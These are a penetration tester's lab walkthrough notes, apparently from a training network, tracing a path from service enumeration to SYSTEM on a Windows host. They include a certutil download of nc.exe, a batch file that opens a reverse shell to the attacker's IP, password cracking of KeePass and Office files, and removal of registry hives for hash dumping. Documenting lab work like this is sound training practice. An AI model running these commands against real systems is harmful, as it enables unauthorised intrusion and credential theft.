# Nmap scans - light ![[images/Pasted image 20260701203858.png]] - create `ports.txt` ![[images/Pasted image 20260701203924.png]] - detailed ![[images/Pasted image 20260702134339.png]] # Port 445 (SMB) - shares ![[images/Pasted image 20260702154307.png]] - users > nothing - rid-brute![[images/Pasted image 20260702154349.png]] --- # Port 8080 (http; tomcat 10.0.21) - visit page ![[images/Pasted image 20260702191316.png]] ## fuzzing - run `dirbuster` ```bash gobuster dir -u http://172.16.8.50:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt ``` ![[images/Pasted image 20260702191828.png]] - run `feroxbuster` ![[images/Pasted image 20260702204143.png]] - `/manager` ![[images/Pasted image 20260702191446.png]] ## `mgr_brute.py` - run `mgr_brute.py` > nothing ```bash python3 mgr_brute.py -U http://ms01.inlanefreight.local:8080/ -P /manager/ -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt ``` ![[images/Pasted image 20260702205648.png]] ## msf module - run msf `scanner/http/tomcat_mgr_login` > nothing ![[images/Pasted image 20260702202709.png]] --- # shell as `backupadm` - `whoami /all` after `evil-winrm` access ![[images/Pasted image 20260702215222.png]] - home dir is empty ![[images/Pasted image 20260702215257.png]] - interesting files in root dir ![[images/Pasted image 20260702215311.png]] - download `.xlsx` and `.kdbx` ![[images/Pasted image 20260702215453.png]] - `unattend.xml` in `\panther\` ![[images/Pasted image 20260702215349.png]] ## review exfiltrated goodies - multiple goodies to review ![[images/Pasted image 20260702215506.png]] - `unattend.xml` has creds for `ilfserveradm` - `.xlsx` is password protected > we can do an `office2john` and crack ![[images/Pasted image 20260702215755.png]] ```bash office2john budget_data.xlsx | tee budget.hash john budget.hash -wordlist=/opt/rockyou.txt ``` ![[images/Pasted image 20260703112009.png]] ![[images/Pasted image 20260703112122.png]] - not seeing anything of use in this `.xlsx`![[images/Pasted image 20260703112701.png]] - process the `.kdbx` ```bash keepass2john passcodes.kdbx > keepass.hash john keepass.hash -wordlist=/opt/rockyou.txt ``` ![[images/Pasted image 20260703113029.png]] - open with `kpcli` or `keepassxc` which has a GUI - creds for Administrator, mssql, and Michael321 ![[images/Pasted image 20260703113631.png]] ## confirm creds - creds for Administrator, mssql, and Michael321 do not work on MS01 - creds for `ilfserveradm` work on MS01 smb and rdp but not winrm --- # RDP as `ilfserveradm` ## Initial Enum - `whoami /all` ![[images/Pasted image 20260703114529.png]] - not much in home dir ![[images/Pasted image 20260703114549.png]] - networking ![[images/Pasted image 20260703114840.png]] - local user and administrators ![[images/Pasted image 20260703115520.png]] ## Enum Installed Apps - `\Program Files`![[images/Pasted image 20260703114716.png]] - `\Program Files (x86)` ![[images/Pasted image 20260703114736.png]] - `sysaxautomation` is non-default - looks like ver.6.9.0 is vulnerable ![[images/Pasted image 20260703122158.png]] - list installed programs ```powershell Get-WmiObject -Class Win32_Product | select Name, Version ``` ![[images/Pasted image 20260703122358.png]] - check scheduled tasks ```powershell Get-ScheduledTask | select TaskName,State ``` ![[images/Pasted image 20260703122406.png]] ### `sysaxautomation` #### enumerate access - run `icacls` on folder ![[images/Pasted image 20260703115759.png]] - move `Get-ServiceACL.ps1` ```powershell certutil.exe -urlcache -split -f http://172.16.8.120:9001/Get-ServiceACL.ps1 c:\programdata\Get-ServiceACL.ps1 ``` ![[images/Pasted image 20260703121531.png]] - inspect ACLs for `syaxautomation` ```powershell Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process . .\Get-ServiceACL.ps1 "sysaxschedscp" | Get-ServiceAcl | select -ExpandProperty Access ``` - having issues ![[images/Pasted image 20260703121908.png]] - use `Get-Acl` ```powershell (Get-Acl -Path "C:\Program Files (x86)\sysaxautomation\sysaxftp.exe").Access | Format-Table IdentityReference, FileSystemRights, AccessControlType, IsInherited (Get-Acl -Path "C:\Program Files (x86)\sysaxautomation\sysaxsched.exe ").Access | Format-Table IdentityReference, FileSystemRights, AccessControlType, IsInherite ``` ![[images/Pasted image 20260703122952.png]] - all users can run these programs #### exploit - follow steps at: [💀 Exploit for Sysax FTP Automation 6.9.0 - Privilege Escalation](https://sploitus.com/exploit?id=EDB-ID:50834) - Move `nc.exe` to target ```powershell certutil.exe -urlcache -split -f http://172.16.8.120:9001/nc.exe c:\programdata\nc.exe ``` ![[images/Pasted image 20260703124035.png]] - Create `shell.bat` on Kali and move to target ```cmd c:\programdata\nc.exe 172.16.8.120 9002 -e cmd ``` ![[images/Pasted image 20260703124220.png]] ```powershell certutil.exe -urlcache -split -f http://172.16.8.120:9001/shell.bat c:\programdata\shell.bat ``` ![[images/Pasted image 20260703124246.png]] - setup listener on Kali ![[images/Pasted image 20260703124259.png]] - Open `sysaxschedscp.exe` from `C:\Program Files (x86)\SysaxAutomation` - Add a task to run `shell.bat` whenever a file is added to `\users\ilfserveradm\documents` and save - Add a file to `\users\ilfserveradm\documents` - We have a shell as `nt authority\system`![[images/Pasted image 20260703125004.png]] --- # shell as `nt authority\system` - cascade home dir ![[images/Pasted image 20260703125043.png]] - look for additional flags ```powershell Get-ChildItem -Path C:\ -Filter "flag.txt" -Recurse -ErrorAction SilentlyContinue ``` - save sam, system security hives ```cmd reg.exe save hklm\sam C:\programdata\sam.save reg.exe save hklm\system C:\programdata\system.save reg.exe save hklm\security C:\programdata\security.save ``` ![[images/Pasted image 20260703125405.png]] - setup port forward on pivot for port 425 and stand up smbserver with creds on Kali ```bash mkdir share/ sudo impacket-smbserver share -smb2support share/ -user test -password test ``` ![[images/Pasted image 20260703125750.png]] - exfil hives back to Kali ```cmd net use n: \\172.16.8.120\share /user:test test #mount share move sam.save n:\ move system.save n:\ move security.save n:\ ``` ![[images/Pasted image 20260703125758.png]] - confirm ![[images/Pasted image 20260703125819.png]] - extract hashes ```bash secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | tee ../MS01.hashes ``` ![[images/Pasted image 20260703130337.png]] - save to file `MS01.hashes` - looks like we have a plaintext password for `inlanefreight.local/mssqladm` - confirmed to work on DC01 over smb